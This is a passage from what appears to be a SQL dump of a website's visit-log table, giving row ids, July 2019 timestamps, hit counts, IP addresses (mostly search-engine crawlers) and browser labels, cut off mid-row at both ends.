,2,0,0,'157.55.39.155','other'),(438191,1564298388,1,1,0,0,'40.77.167.81','other'),(438192,1564299611,1,1,0,0,'95.108.181.54','other'),(438193,1564299745,1,1,0,0,'207.46.13.218','other'),(438194,1564300093,1,1,0,0,'141.8.188.21','other'),(438195,1564300452,1,1,0,0,'178.154.171.17','other'),(438196,1564301516,1,1,0,0,'178.154.171.69','other'),(438197,1564301593,1,1,0,0,'87.250.224.99','other'),(438198,1564302166,1,1,0,0,'40.77.167.81','other'),(438199,1564303765,1,1,0,0,'8.29.198.26','other'),(438200,1564303811,1,1,0,0,'141.8.142.81','other'),(438201,1564305219,1,1,0,0,'213.180.203.61','other'),(438202,1564305564,1,1,0,0,'66.249.66.222','chrome'),(438203,1564305804,1,1,0,0,'207.46.13.154','other'),(438204,1564306024,1,1,0,0,'8.29.198.27','other'),(438205,1564306196,1,1,0,0,'40.77.167.1','other'),(438206,1564306420,1,1,0,0,'157.55.39.199','other'),(438207,1564306994,1,1,0,0,'87.250.224.64','other'),(438208,1564308611,1,1,0,0,'109.74.154.72','chrome'),(438209,1564308724,1,1,0,0,'207.46.13.154','other'),(438210,1564308725,1,1,0,0,'5.45.207.8','other'),(438211,1564309566,1,1,0,0,'66.249.66.222','chrome'),(438212,1564309611,1,1,0,0,'111.202.101.135','other'),(438213,1564310387,1,1,0,0,'95.108.181.83','other'),(438214,1564310504,1,1,0,0,'157.55.39.199','other'),(438215,1564310853,1,1,0,0,'207.46.13.123','other'),(438216,1564311753,1,1,0,0,'5.45.207.76','other'),(438217,1564311775,1,1,0,0,'5.45.207.8','other'),(438218,1564311788,1,1,0,0,'5.255.253.25','other'),(438219,1564311791,1,1,0,0,'141.8.132.16','other'),(438220,1564311794,1,1,0,0,'178.154.171.30','other'),(438221,1564311806,2,2,0,0,'213.180.203.48','other'),(438222,1564311865,1,1,0,0,'178.154.171.69','other'),(438223,1564311943,1,1,0,0,'66.249.66.130','chrome'),(438224,1564311969,2,2,0,0,'207.46.13.154','other'),(438225,1564312431,1,1,0,0,'5.255.253.16','other'),(438226,1564313451,1,1,0,0,'87.250.224.107','other'),(438227,1564314602,1,1,0,0,'8.29.198.26','other'),(438228,1564315578,2,2,0,0,'66.249.66.128','chrome'),(438229,1564315792,4,4,0,0,'66.249.66.218','chrome'),(438230,1564315822,2,2,0,0,'66.249.66.220','chrome'),(438231,1564316142,1,1,0,0,'87.250.224.107','other'),(438232,1564316344,1,1,0,0,'66.249.66.222','chrome'),(438233,1564316864,1,1,0,0,'8.29.198.25','other'),(438234,1564317291,2,2,0,0,'157.55.39.199','other'),(438235,1564317295,1,1,0,0,'157.55.39.81','other'),(438236,1564317873,2,2,0,0,'141.8.188.29','other'),(438237,1564318549,1,1,0,0,'40.77.167.179','other'),(438238,1564319338,1,1,0,0,'157.55.39.81','other'),(438239,1564320320,2,2,0,0,'141.8.188.29','other'),(438240,1564321080,1,1,0,0,'46.188.33.126','msie'),(438241,1564322310,1,1,0,0,'5.45.207.79','other'),(438242,1564322352,1,1,0,0,'141.8.188.29','other'),(438243,1564322956,1,1,0,0,'157.55.39.199','other'),(438244,1564323432,2,2,0,0,'66.249.66.218','chrome'),(438245,1564323967,7,7,0,0,'66.249.66.220','chrome'),(438246,1564324039,3,3,0,0,'66.249.66.128','chrome'),(438247,1564324283,1,1,0,0,'66.249.66.132','chrome'),(438248,1564324354,2,2,0,0,'207.46.13.140','other'),(438249,1564324494,1,1,0,0,'5.45.207.79','other'),(438250,1564324554,2,2,0,0,'66.249.66.222','chrome'),(438251,1564325027,1,1,0,0,'141.8.188.29','other'),(438252,1564325108,1,1,0,0,'66.249.66.130','chrome'),(438253,1564325179,1,1,0,0,'157.55.39.130','other'),(438254,1564325420,2,2,0,0,'66.249.66.220','chrome'),(438255,1564325449,1,1,0,0,'8.29.198.27','other'),(438256,1564325796,3,3,0,0,'66.249.66.222','chrome'),(438257,1564325867,1,1,0,0,'95.108.213.4','other'),(438258,1564326306,1,1,0,0,'157.55.39.130','other'),(438259,1564326422,1,1,0,0,'157.55.39.81','other'),(438260,1564326483,1,1,0,0,'5.45.207.19','other'),(438261,1564326514,2,2,0,0,'141.8.188.29','other'),(438262,1564326517,1,1,0,0,'5.45.207.79','other'),(438263,1564326617,6,6,0,0,'66.249.66.220','chrome'),(438264,1564326684,1,1,0,0,'66.249.66.218','chrome'),(438265,1564326909,1,1,0,0,'66.249.66.128','chrome'),(438266,1564327185,1,1,0,0,'157.55.39.63','other'),(438267,1564327240,1,1,0,0,'40.77.167.134','other'),(438268,1564327533,3,3,0,0,'66.249.66.222','chrome'),(438269,1564327575,5,5,0,0,'66.249.66.220','chrome'),(438270,1564327714,1,1,0,0,'8.29.198.25','other'),(438271,1564327718,4,4,0,0,'66.249.66.218','chrome'),(438272,1564327886,1,1,0,0,'141.8.188.29','other'),(438273,1564328605,2,2,0,0,'66.249.66.130','chrome'),(438274,1564328704,8,8,0,0,'66.249.66.218','chrome'),(438275,1564328766,3,3,0,0,'66.249.66.222','chrome'),(438276,1564328923,9,9,0,0,'66.249.66.220','chrome'),(438277,1564328937,2,2,0,0,'66.249.66.128','chrome'),(438278,1564329851,1,1,0,0,'66.249.66.222','chrome'),(438279,1564329979,1,1,0,0,'157.55.39.162','other'),(438280,1564330365,3,3,0,0,'66.249.66.220','chrome'),(438281,1564330567,1,1,0,0,'77.74.177.114','chrome'),(438282,1564330628,1,0,1,0,'178.6.243.60',''),(438283,1564330993,2,2,0,0,'66.249.66.218','chrome'),(438284,1564331474,1,1,0,0,'66.249.66.220','chrome'),(438285,1564331543,1,1,0,0,'66.249.66.222','chrome'),(438286,1564332947,1,1,0,0,'157.55.39.63','other'),(438287,1564333657,2,2,0,0,'66.249.66.222','chrome'),(438288,1564333702,1,1,0,0,'157.55.39.81','other'),(438289,1564334445,4,4,0,0,'157.55.39.162','other'),(438290,1564334523,2,2,0,0,'66.249.66.218','chrome'),(438291,1564334910,2,2,0,0,'66.249.66.128','chrome'),(438292,1564335233,1,1,0,0,'157.55.39.63','other'),(438293,1564335563,1,1,0,0,'157.55.39.162','other'),(438294,1564335671,3,3,0,0,'66.249.66.218','chrome'),(438295,1564336294,1,1,0,0,'8.29.198.26','other'),(438296,1564338056,2,2,0,0,'66.249.66.220','chrome'),(438297,1564338151,2,2,0,0,'66.249.66.218','chrome'),(438298,1564338162,1,1,0,0,'40.77.167.158','other'),(438299,1564338524,3,3,0,0,'66.249.66.222','chrome'),(438300,1564338581,1,1,0,0,'8.29.198.27','other'),(438301,1564339361,1,1,0,0,'66.249.66.220','chrome'),(438302,1564340025,2,2,0,0,'66.249.66.222','chrome'),(438303,1564340134,1,1,0,0,'180.76.15.6','other'),(438304,1564340219,2,2,0,0,'66.249.66.218','chrome'),(438305,1564340522,1,1,0,0,'46.211.132.102','chrome'),(438306,1564341144,2,2,0,0,'66.249.66.218','chrome'),(438307,1564341251,1,1,0,0,'66.249.66.130','chrome'),(438308,1564342131,1,1,0,0,'5.45.207.79','other'),(438309,1564342462,1,1,0,0,'66.249.66.220','chrome'),(438310,1564342478,2,2,0,0,'66.249.66.218','chrome'),(438311,1564343436,2,2,0,0,'66.249.66.220','chrome'),(438312,1564343715,1,1,0,0,'141.8.132.16','other'),(438313,1564343756,1,1,0,0,'5.45.207.79','other'),(438314,1564344073,1,1,0,0,'66.249.66.222','chrome'),(438315,1564344278,1,1,0,0,'40.77.167.30','other'),(438316,1564344299,1,1,0,0,'66.249.66.132','chrome'),(438317,1564344559,1,1,0,0,'141.8.188.29','other'),(438318,1564344797,2,2,0,0,'66.249.66.218','chrome'),(438319,1564345752,2,2,0,0,'66.249.66.130','chrome'),(438320,1564346029,1,1,0,0,'66.249.66.220','chrome'),(438321,1564346629,1,1,0,0,'66.249.66.218','chrome'),(438322,1564346642,1,1,0,0,'40.77.167.30','other'),(438323,1564347147,1,1,0,0,'8.29.198.26','other'),(438324,1564347210,1,1,0,0,'141.8.188.11','other'),(438325,1564347650,1,1,0,0,'66.249.66.222','chrome'),(438326,1564348456,1,1,0,0,'66.249.66.130','chrome'),(438327,1564348627,1,1,0,0,'207.46.13.162','other'),(438328,1564348882,1,1,0,0,'141.8.188.29','other'),(438329,1564349050,1,1,0,0,'66.249.66.132','chrome'),(438330,1564349210,1,1,0,0,'95.108.213.4','other'),(438331,1564349450,1,1,0,0,'8.29.198.25','other'),(438332,1564349531,3,3,0,0,'40.77.167.158','other'),(438333,1564349535,1,1,0,0,'157.55.39.117','other'),(438334,1564349540,1,1,0,0,'207.46.13.162','other'),(438335,1564349740,1,1,0,0,'66.249.66.218','chrome'),(438336,1564350446,1,1,0,0,'66.249.66.220','chrome'),(438337,1564350571,1,1,0,0,'5.45.207.79','other'),(438338,1564350582,1,1,0,0,'141.8.188.29','other'),(438339,1564351130,2,2,0,0,'66.249.66.218','chrome'),(438340,1564351570,2,2,0,0,'66.249.66.220','chrome'),(438341,1564351774,1,1,0,0,'40.77.167.158','other'),(438342,1564351851,1,1,0,0,'66.249.66.130','chrome'),(438343,1564352700,1,1,0,0,'207.46.13.173','other'),(438344,1564352732,2,2,0,0,'141.8.188.29','other'),(438345,1564352774,1,1,0,0,'95.108.213.4','other'),(438346,1564352942,1,1,0,0,'5.45.207.79','other'),(438347,1564353120,1,1,0,0,'207.46.13.162','other'),(438348,1564353507,1,1,0,0,'66.249.66.222','chrome'),(438349,1564353994,1,1,0,0,'66.249.66.220','chrome'),(438350,1564354176,1,1,0,0,'66.249.66.218','chrome'),(438351,1564354372,1,1,0,0,'188.255.39.237','msie'),(438352,1564354654,1,1,0,0,'141.8.188.29','other'),(438353,1564356173,1,1,0,0,'5.45.207.19','other'),(438354,1564356578,1,1,0,0,'141.8.188.29','other'),(438355,1564357084,1,1,0,0,'66.249.66.222','chrome'),(438356,1564357108,1,1,0,0,'66.249.66.128','chrome'),(438357,1564357634,2,2,0,0,'66.249.66.220','chrome'),(438358,1564357877,1,1,0,0,'122.152.250.168','other'),(438359,1564357988,1,1,0,0,'8.29.198.27','other'),(438360,1564358347,1,1,0,0,'5.45.207.79','other'),(438361,1564358481,1,1,0,0,'141.8.188.29','other'),(438362,1564358553,280,280,0,0,'144.76.38.40','other'),(438363,1564358677,1,1,0,0,'66.249.66.128','chrome'),(438364,1564358759,2,2,0,0,'207.46.13.81','other'),(438365,1564359125,2,2,0,0,'66.249.66.220','chrome'),(438366,1564359805,1,1,0,0,'198.204.243.138','other'),(438367,1564360297,1,1,0,0,'8.29.198.26','other'),(438368,1564360396,2,2,0,0,'40.77.167.168','other'),(438369,1564360732,1,1,0,0,'66.249.66.132','chrome'),(438370,1564360869,2,2,0,0,'66.249.66.218','chrome'),(438371,1564361829,1,1,0,0,'141.8.188.29','other'),(438372,1564362159,1,1,0,0,'66.249.66.222','chrome'),(438373,1564362316,1,1,0,0,'157.55.39.223','other'),(438374,1564362341,1,1,0,0,'66.249.66.128','chrome'),(438375,1564362388,1,1,0,0,'66.249.66.218','chrome'),(438376,1564362469,1,1,0,0,'66.249.66.220','chrome'),(438377,1564363436,2,2,0,0,'66.249.66.220','chrome'),(438378,1564363923,1,1,0,0,'66.249.66.130','chrome'),(438379,1564363980,1,1,0,0,'66.249.66.222','chrome'),(438380,1564363985,1,1,0,0,'34.219.185.49','other'),(438381,1564364989,1,1,0,0,'66.249.66.222','chrome'),(438382,1564365343,1,1,0,0,'40.77.167.162','other'),(438383,1564366440,1,1,0,0,'37.9.113.20','other'),(438384,1564366997,1,1,0,0,'40.77.167.168','other'),(438385,1564367079,1,1,0,0,'66.249.66.130','chrome'),(438386,1564367466,1,1,0,0,'66.249.66.218','chrome'),(438387,1564368330,1,1,0,0,'40.77.167.162','other'),(438388,1564368647,1,1,0,0,'5.45.207.79','other'),(438389,1564368833,1,1,0,0,'8.29.198.26','other'),(438390,1564368984,2,2,0,0,'40.77.167.168','other'),(438391,1564369147,2,2,0,0,'157.55.39.223','other'),(438392,1564369177,1,1,0,0,'66.249.66.130','chrome'),(438393,1564370045,1,1,0,0,'66.249.66.220','chrome'),(438394,1564370358,2,2,0,0,'66.249.66.222','chrome'),(438395,1564370471,1,1,0,0,'5.45.207.79','other'),(438396,1564370488,1,1,0,0,'40.77.167.168','other'),(438397,1564370492,2,2,0,0,'40.77.167.162','other'),(438398,1564371146,1,1,0,0,'8.29.198.27','other'),(438399,1564371301,1,1,0,0,'66.249.66.218','chrome'),(438400,1564371319,1,1,0,0,'66.249.66.220','chrome'),(438401,1564372369,1,1,0,0,'66.249.66.222','chrome'),(438402,1564372717,1,1,0,0,'5.45.207.79','other'),(438403,1564372742,1,1,0,0,'5.45.207.19','other'),(438404,1564373104,1,1,0,0,'66.249.66.132','chrome'),(438405,1564373762,1,1,0,0,'157.55.39.117','other'),(438406,1564373767,2,2,0,0,'40.77.167.2','other'),(438407,1564374067,1,1,0,0,'157.55.39.223','other'),(438408,1564374444,1,1,0,0,'66.249.66.220','chrome'),(438409,1564374652,1,1,0,0,'87.250.224.65','other'),(438410,1564374721,1,1,0,0,'87.250.224.81','other'),(438411,1564374928,1,1,0,0,'66.249.66.218','chrome'),(438412,1564375048,1,1,0,0,'40.77.167.2','other'),(438413,1564375942,1,1,0,0,'66.249.66.222','chrome'),(438414,1564376392,1,1,0,0,'66.249.66.220','chrome'),(438415,1564376418,2,2,0,0,'141.8.188.11','other'),(438416,1564376894,3,2,1,0,'66.249.66.218',''),(438417,1564377289,1,1,0,0,'40.77.167.164','other'),(438418,1564377292,1,1,0,0,'66.249.66.128','chrome'),(438419,1564378146,1,1,0,0,'157.55.39.223','other'),(438420,1564378257,1,1,0,0,'141.8.188.11','other'),(438421,1564378342,1,1,0,0,'157.55.39.174','other'),(438422,1564378668,2,2,0,0,'66.249.66.222','chrome'),(438423,1564379179,2,2,0,0,'66.249.66.128','chrome'),(438424,1564379271,2,2,0,0,'66.249.66.218','chrome'),(438425,1564379524,1,1,0,0,'66.249.66.220','chrome'),(438426,1564379642,1,1,0,0,'66.249.66.130','chrome'),(438427,1564379652,1,1,0,0,'40.77.167.2','other'),(438428,1564379680,1,1,0,0,'8.29.198.27','other'),(438429,1564380179,1,1,0,0,'66.249.66.218','chrome'),(438430,1564380327,1,1,0,0,'37.9.113.148','other'),(438431,1564380940,1,1,0,0,'5.45.207.79','other'),(438432,1564381717,1,1,0,0,'66.249.66.220','chrome'),(438433,1564381984,1,1,0,0,'8.29.198.26','other'),(438434,1564382433,1,1,0,0,'157.55.39.223','other'),(438435,1564382676,1,1,0,0,'66.249.66.130','chrome'),(438436,1564382996,2,2,0,0,'66.249.66.220','chrome'),(438437,1564383030,1,1,0,0,'66.249.66.222','chrome'),(438438,1564383301,1,1,0,0,'40.77.167.2','other'),(438439,1564383843,2,2,0,0,'66.249.66.128','chrome'),(438440,1564384048,1,1,0,0,'66.249.66.220','chrome'),(438441,1564384412,1,1,0,0,'66.249.66.222','chrome'),(438442,1564384646,1,1,0,0,'66.249.66.132','chrome'),(438443,1564384743,1,1,0,0,'66.249.66.218','chrome'),(438444,1564384897,1,1,0,0,'46.211.104.221','chrome'),(438445,1564384967,1,1,0,0,'141.8.188.29','other'),(438446,1564385014,1,1,0,0,'5.45.207.19','other'),(438447,1564385162,1,1,0,0,'66.249.66.130','chrome'),(438448,1564385238,1,1,0,0,'40.77.167.164','other'),(438449,1564385352,2,2,0,0,'66.249.66.222','chrome'),(438450,1564385397,1,1,0,0,'157.55.39.223','other'),(438451,1564385825,1,1,0,0,'94.178.150.17','chrome'),(438452,1564385836,1,1,0,0,'66.249.66.132','chrome'),(438453,1564385986,1,1,0,0,'66.249.66.220','chrome'),(438454,1564386305,1,1,0,0,'141.8.188.11','other'),(438455,1564386598,1,1,0,0,'141.8.142.103','other'),(438456,1564386616,1,1,0,0,'37.9.113.103','other'),(438457,1564386681,1,1,0,0,'37.9.113.20','other'),(438458,1564387452,1,1,0,0,'66.249.66.222','chrome'),(438459,1564387457,1,1,0,0,'66.249.66.220','chrome'),(438460,1564387512,1,1,0,0,'157.55.39.210','other'),(438461,1564388696,2,2,0,0,'141.8.188.11','other'),(438462,1564388961,1,1,0,0,'157.55.39.174','other'),(438463,1564389616,1,1,0,0,'91.196.178.79','chrome'),(438464,1564390006,2,2,0,0,'141.8.188.29','other'),(438465,1564390343,1,1,0,0,'157.55.39.223','other'),(438466,1564390480,2,2,0,0,'141.8.188.11','other'),(438467,1564390520,1,1,0,0,'8.29.198.25','other'),(438468,1564391169,1,1,0,0,'178.92.249.252','chrome'),(438469,1564391666,1,1,0,0,'66.249.66.222','chrome'),(438470,1564391748,1,1,0,0,'66.249.66.220','chrome'),(438471,1564392047,1,1,0,0,'207.46.13.177','other'),(438472,1564392392,2,2,0,0,'66.249.66.218','chrome'),(438473,1564392549,1,1,0,0,'141.8.188.29','other'),(438474,1564392830,1,1,0,0,'8.29.198.27','other'),(438475,1564393559,1,1,0,0,'66.249.66.128','chrome'),(438476,1564394701,1,1,0,0,'66.249.66.220','chrome'),(438477,1564394730,1,1,0,0,'66.249.66.130','chrome'),(438478,1564395083,1,1,0,0,'66.249.66.128','chrome'),(438479,1564395125,1,1,0,0,'66.249.66.218','chrome'),(438480,1564395201,1,1,0,0,'66.249.66.222','chrome'),(438481,1564395325,1,1,0,0,'109.74.154.72','chrome'),(438482,1564395508,1,1,0,0,'141.8.188.29','other'),(438483,1564396449,3,3,0,0,'66.249.66.220','chrome'),(438484,1564396515,1,1,0,0,'66.249.66.222','chrome'),(438485,1564396828,1,1,0,0,'157.55.39.210','other'),(438486,1564397494,1,1,0,0,'66.249.66.132','chrome'),(438487,1564397944,3,3,0,0,'66.249.66.220','chrome'),(438488,1564398799,1,1,0,0,'180.76.15.147','other'),(438489,1564398952,1,1,0,0,'207.46.13.214','other'),(438490,1564398964,1,1,0,0,'157.55.39.174','other'),(438491,1564399095,1,1,0,0,'157.55.39.210','other'),(438492,1564400218,1,1,0,0,'91.124.182.170','firefox'),(438493,1564400591,1,1,0,0,'40.77.167.148','other'),(438494,1564400621,1,1,0,0,'66.249.66.222','chrome'),(438495,1564400984,1,1,0,0,'66.249.66.132','chrome'),(438496,1564401021,1,1,0,0,'157.55.39.174','other'),(438497,1564401357,1,1,0,0,'8.29.198.25','other'),(438498,1564403034,2,2,0,0,'40.77.167.148','other'),(438499,1564403137,2,2,0,0,'66.249.66.132','chrome'),(438500,1564403646,1,1,0,0,'91.196.178.75','chrome'),(438501,1564403672,1,1,0,0,'8.29.198.26','other'),(438502,1564403907,1,1,0,0,'66.249.66.220','chrome'),(438503,1564405330,1,1,0,0,'157.55.39.174','other'),(438504,1564405339,2,2,0,0,'207.46.13.177','other'),(438505,1564405475,1,1,0,0,'185.15.56.22','other'),(438506,1564406450,1,1,0,0,'40.77.167.148','other'),(438507,1564407226,1,1,0,0,'141.8.188.49','other'),(438508,1564407256,1,1,0,0,'141.8.188.29','other'),(438509,1564407939,1,1,0,0,'141.8.188.11','other'),(438510,1564408150,1,1,0,0,'40.77.167.148','other'),(438511,1564410031,1,1,0,0,'91.196.178.104','chrome'),(438512,1564410544,1,1,0,0,'66.249.66.130','chrome'),(438513,1564411116,1,1,0,0,'157.55.39.206','other'),(438514,1564411620,1,1,0,0,'207.46.13.177','other'),(438515,1564412192,1,1,0,0,'8.29.198.26','other'),(438516,1564413077,1,1,0,0,'66.249.66.222','chrome'),(438517,1564413124,1,1,0,0,'66.249.66.130','chrome'),(438518,1564414143,1,1,0,0,'157.55.39.206','other'),(438519,1564414304,1,1,0,0,'207.46.13.177','other'),(438520,1564414521,1,1,0,0,'8.29.198.25','other'),(438521,1564414557,1,1,0,0,'141.8.188.11','other'),(438522,1564414589,1,1,0,0,'141.8.142.103','other'),(438523,1564414627,1,1,0,0,'5.45.207.19','other'),(438524,1564414800,2,2,0,0,'40.77.167.181','other'),(438525,1564415246,1,1,0,0,'40.77.167.222','other'),(438526,1564415614,1,1,0,0,'40.77.167.95','other'),(438527,1564416147,1,1,0,0,'141.8.183.23','other'),(438528,1564416241,2,2,0,0,'66.249.66.130','chrome'),(438529,1564416687,2,2,0,0,'66.249.66.220','chrome'),(438530,1564416736,1,1,0,0,'91.209.11.236','other'),(438531,1564417026,1,1,0,0,'141.8.188.29','other'),(438532,1564417225,1,1,0,0,'5.45.207.19','other'),(438533,1564417242,1,1,0,0,'5.45.207.79','other'),(438534,1564417381,2,2,0,0,'207.46.13.85','other'),(438535,1564417519,1,1,0,0,'157.55.39.206','other'),(438536,1564417930,1,1,0,0,'66.249.66.222','chrome'),(438537,1564418523,1,1,0,0,'66.249.66.218','chrome'),(438538,1564418818,1,1,0,0,'5.45.207.79','other'),(438539,1564418881,2,2,0,0,'40.77.167.75','other'),(438540,1564419385,1,1,0,0,'141.8.142.103','other'),(438541,1564419408,1,1,0,0,'95.108.213.4','other'),(438542,1564419526,1,1,0,0,'207.46.13.85','other'),(438543,1564420463,1,1,0,0,'46.211.47.11','chrome'),(438544,1564423033,1,1,0,0,'8.29.198.26','other'),(438545,1564423445,1,1,0,0,'87.250.224.47','other'),(438546,1564423520,1,1,0,0,'141.8.188.29','other'),(438547,1564424415,1,1,0,0,'141.8.188.11','other'),(438548,1564425345,1,1,0,0,'5.45.207.79','other'),(438549,1564425377,1,1,0,0,'8.29.198.27','other'),(438550,1564425621,1,1,0,0,'141.8.188.11','other'),(438551,1564425838,1,1,0,0,'207.46.13.85','other'),(438552,1564425991,2,2,0,0,'66.249.66.128','chrome'),(438553,1564426023,2,2,0,0,'40.77.167.130','other'),(438554,1564427344,1,1,0,0,'207.46.13.85','other'),(438555,1564427425,2,2,0,0,'95.108.213.4','other'),(438556,1564427463,1,1,0,0,'5.45.207.19','other'),(438557,1564428918,1,1,0,0,'66.249.66.218','chrome'),(438558,1564429247,1,1,0,0,'141.8.188.29','other'),(438559,1564430159,2,2,0,0,'5.45.207.79','other'),(438560,1564430214,1,1,0,0,'13.66.139.0','other'),(438561,1564430287,2,2,0,0,'95.213.141.126','opera'),(438562,1564430766,1,1,0,0,'157.55.39.206','other'),(438564,1564431070,1,1,0,0,'141.8.188.11','other'),(438565,1564431104,1,1,0,0,'141.8.188.29','other'),(438566,1564431105,1,1,0,0,'141.8.142.103','other'),(438567,1564431540,1,1,0,0,'5.45.207.19','other'),(438568,1564432758,1,1,0,0,'66.249.66.132','chrome'),(438569,1564433170,1,1,0,0,'141.8.188.29','other'),(438570,1564433308,1,1,0,0,'141.8.188.11','other'),(438571,1564433875,1,1,0,0,'8.29.198.27','other'),(438572,1564434001,1,1,0,0,'207.46.13.85','other'),(438573,1564434536,1,1,0,0,'157.55.39.190','other'),(438574,1564434994,2,2,0,0,'141.8.188.11','other'),(438575,1564435165,1,1,0,0,'207.46.13.18','other'),(438576,1564435319,1,1,0,0,'157.55.39.65','other'),(438577,1564436215,1,1,0,0,'8.29.198.26','other'),(438578,1564436386,3,3,0,0,'66.249.66.222','chrome'),(438579,1564436533,1,1,0,0,'141.8.188.29','other'),(438580,1564436539,1,1,0,0,'207.46.13.85','other'),(438581,1564436650,1,1,0,0,'207.46.13.18','other'),(438582,1564437888,1,1,0,0,'40.77.167.52','other'),(438583,1564438573,1,1,0,0,'5.45.207.79','other'),(438584,1564439035,1,1,0,0,'66.249.66.220','chrome'),(438585,1564439116,1,1,0,0,'5.45.207.19','other'),(438586,1564439762,1,1,0,0,'66.249.66.218','chrome'),(438587,1564440080,1,1,0,0,'207.46.13.18','other'),(438588,1564440100,1,1,0,0,'66.249.66.222','chrome'),(438589,1564440188,1,1,0,0,'40.77.167.52','other'),(438590,1564440493,1,1,0,0,'207.46.13.217','other'),(438591,1564441270,1,1,0,0,'66.249.66.222','chrome'),(438592,1564441538,1,1,0,0,'66.249.66.128','chrome'),(438593,1564441940,1,1,0,0,'66.249.66.218','chrome'),(438594,1564442074,2,2,0,0,'141.8.188.29','other'),(438595,1564442093,2,2,0,0,'141.8.188.11','other'),(438596,1564442103,1,1,0,0,'207.46.13.18','other'),(438597,1564442648,1,1,0,0,'207.46.13.216','other'),(438598,1564443493,1,1,0,0,'207.46.13.217','other'),(438599,1564443692,1,1,0,0,'207.46.13.18','other'),(438600,1564444712,1,1,0,0,'8.29.198.26','other'),(438601,1564445529,1,1,0,0,'207.46.13.18','other'),(438602,1564445533,1,1,0,0,'207.46.13.152','other'),(438603,1564445956,1,1,0,0,'66.249.66.132','chrome'),(438604,1564446202,1,1,0,0,'141.8.188.29','other'),(438605,1564447067,1,1,0,0,'8.29.198.27','other'),(438606,1564447275,1,1,0,0,'66.249.66.222','chrome'),(438607,1564447429,1,1,0,0,'141.8.188.11','other'),(438608,1564448037,1,1,0,0,'66.249.66.218','chrome'),(438609,1564448140,1,1,0,0,'207.46.13.217','other'),(438610,1564448608,1,1,0,0,'207.46.13.216','other'),(438611,1564448940,1,1,0,0,'207.46.13.18','other'),(438612,1564449011,1,1,0,0,'207.46.13.152','other'),(438613,1564449083,1,1,0,0,'5.45.207.79','other'),(438614,1564449098,1,1,0,0,'66.249.66.128','chrome'),(438615,1564449146,1,1,0,0,'141.8.188.29','other'),(438616,1564449290,1,1,0,0,'180.76.15.160','other'),(438617,1564449723,1,1,0,0,'207.46.13.217','other'),(438618,1564450084,2,2,0,0,'207.46.13.152','other'),(438619,1564450290,1,1,0,0,'141.8.188.11','other'),(438620,1564451481,1,1,0,0,'66.249.66.220','chrome'),(438621,1564452331,1,1,0,0,'207.46.13.112','other'),(438622,1564452744,1,1,0,0,'66.249.66.220','chrome'),(438623,1564453746,2,2,0,0,'5.45.207.79','other'),(438624,1564453815,2,2,0,0,'141.8.188.11','other'),(438625,1564454116,1,1,0,0,'66.249.66.220','chrome'),(438626,1564454324,1,1,0,0,'103.47.147.2','chrome'),(438627,1564454678,1,1,0,0,'46.211.64.159','chrome'),(438628,1564455358,1,1,0,0,'5.45.207.79','other'),(438629,1564455555,1,1,0,0,'8.29.198.26','other'),(438630,1564456375,1,1,0,0,'141.8.142.103','other'),(438631,1564456719,1,1,0,0,'66.249.66.130','chrome'),(438632,1564457816,1,1,0,0,'141.8.188.29','other'),(438633,1564457908,1,1,0,0,'8.29.198.27','other'),(438634,1564459139,2,2,0,0,'207.46.13.112','other'),(438635,1564459367,7,7,0,0,'78.46.63.108','other'),(438636,1564459386,2,2,0,0,'66.249.66.218','chrome'),(438637,1564460372,1,1,0,0,'157.55.39.209','other'),(438638,1564460850,3,3,0,0,'213.136.75.74','other'),(438639,1564461125,1,1,0,0,'46.211.39.154','chrome'),(438640,1564461293,1,1,0,0,'207.46.13.112','other'),(438641,1564462991,1,1,0,0,'180.76.15.29','other'),(438642,1564463728,1,1,0,0,'141.8.188.29','other'),(438643,1564463776,1,1,0,0,'64.246.165.160','firefox'),(438644,1564463917,1,1,0,0,'141.8.188.11','other'),(438645,1564464155,1,1,0,0,'157.55.39.68','other'),(438646,1564464677,1,1,0,0,'66.249.66.222','chrome'),(438647,1564465152,1,1,0,0,'109.69.90.42','chrome'),(438648,1564465192,1,1,0,0,'141.8.188.29','other'),(438649,1564465385,1,1,0,0,'37.139.8.104','other'),(438650,1564465840,1,1,0,0,'188.190.38.180','chrome'),(438651,1564465850,1,1,0,0,'157.55.39.209','other'),(438652,1564466329,1,1,0,0,'207.46.13.94','other'),(438653,1564466401,1,1,0,0,'8.29.198.26','other'),(438654,1564466887,1,1,0,0,'141.8.188.29','other'),(438655,1564466938,2,2,0,0,'157.55.39.209','other'),(438656,1564467287,1,1,0,0,'141.8.188.11','other'),(438657,1564467650,1,1,0,0,'66.249.66.218','chrome'),(438658,1564468478,1,1,0,0,'157.55.39.68','other'),(438659,1564468745,1,1,0,0,'8.29.198.27','other'),(438660,1564469004,2,2,0,0,'207.46.13.112','other'),(438661,1564469063,1,1,0,0,'141.8.188.29','other'),(438662,1564469211,2,2,0,0,'66.249.66.220','chrome'),(438663,1564470211,1,1,0,0,'157.55.39.209','other'),(438664,1564471372,34,34,0,0,'54.36.99.218','firefox'),(438665,1564471426,3,3,0,0,'207.46.13.94','other'),(438666,1564471430,5,5,0,0,'207.46.13.112','other'),(438667,1564471439,3,3,0,0,'157.55.39.68','other'),(438668,1564472058,1,0,1,0,'66.249.66.222',''),(438669,1564472253,1,1,0,0,'66.249.66.220','chrome'),(438670,1564472405,1,1,0,0,'141.8.188.11','other'),(438671,1564472468,1,1,0,0,'141.8.188.29','other'),(438672,1564472478,1,1,0,0,'207.46.13.94','other'),(438673,1564473245,1,1,0,0,'66.249.66.218','chrome'),(438674,1564473428,1,1,0,0,'66.249.66.222','chrome'),(438675,1564473520,1,1,0,0,'157.55.39.68','other'),(438676,1564473816,1,1,0,0,'157.55.39.219','other'),(438677,1564474174,1,1,0,0,'46.211.54.168','chrome'),(438678,1564474293,2,2,0,0,'66.249.66.218','chrome'),(438679,1564474555,1,1,0,0,'46.211.201.235','chrome'),(438680,1564474846,5,5,0,0,'157.55.39.252','other'),(438681,1564474851,1,1,0,0,'157.55.39.68','other'),(438682,1564474856,2,2,0,0,'157.55.39.219','other'),(438683,1564475031,1,1,0,0,'66.249.66.220','chrome'),(438684,1564475594,1,1,0,0,'91.196.178.170','chrome'),(438685,1564475706,1,1,0,0,'46.211.96.192','chrome'),(438686,1564476837,1,1,0,0,'66.249.66.220','chrome'),(438687,1564476911,1,1,0,0,'80.78.45.211','chrome'),(438688,1564477248,1,1,0,0,'8.29.198.25','other'),(438689,1564477738,1,1,0,0,'66.249.66.222','chrome'),(438690,1564477813,1,1,0,0,'178.140.52.201','msie'),(438691,1564477840,1,1,0,0,'46.211.96.192','chrome'),(438692,1564478875,1,1,0,0,'141.8.188.29','other'),(438693,1564479599,1,1,0,0,'8.29.198.25','other'),(438694,1564479924,1,1,0,0,'40.77.167.164','other'),(438695,1564480086,1,